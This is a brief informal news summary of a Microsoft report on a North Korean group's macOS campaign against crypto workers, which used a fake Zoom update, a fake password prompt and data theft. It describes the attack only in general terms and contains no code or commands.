Cute little scam

Microsoft says a North Korean hacking group called Sapphire Sleet is behind a new macOS attack aimed at people in crypto, finance, and blockchain.

Instead of using a software bug, the group tricked users into opening a fake Zoom update file.

The file looked harmless, but it secretly downloaded more malware once opened in Apple’s Script Editor.

That gave the attackers a way to steal passwords, collect sensitive files, and keep access to the device.

One part of the attack showed a fake macOS password pop-up that looked real.

If the user entered their password, it was checked and then sent to the attackers.

The malware also changed macOS privacy settings to access more data without raising extra alerts.

In brief:

The attack used a fake Zoom update instead of a software exploit.
It relied on fake prompts and trusted Apple tools to steal passwords and data.
Apple and Microsoft have both added protections, but the campaign shows how effective social engineering still is.

Microsoft said the attackers stole browser data, keychain info, Telegram sessions, crypto wallet files, SSH keys, Apple Notes, and system logs.

Apple has since added protections to block parts of the campaign, and Microsoft has shared guidance to help security teams spot similar attacks.

The bigger point is simple: attackers do not always need to break into a system if they can convince a user to let them in.

Big yikes. - MV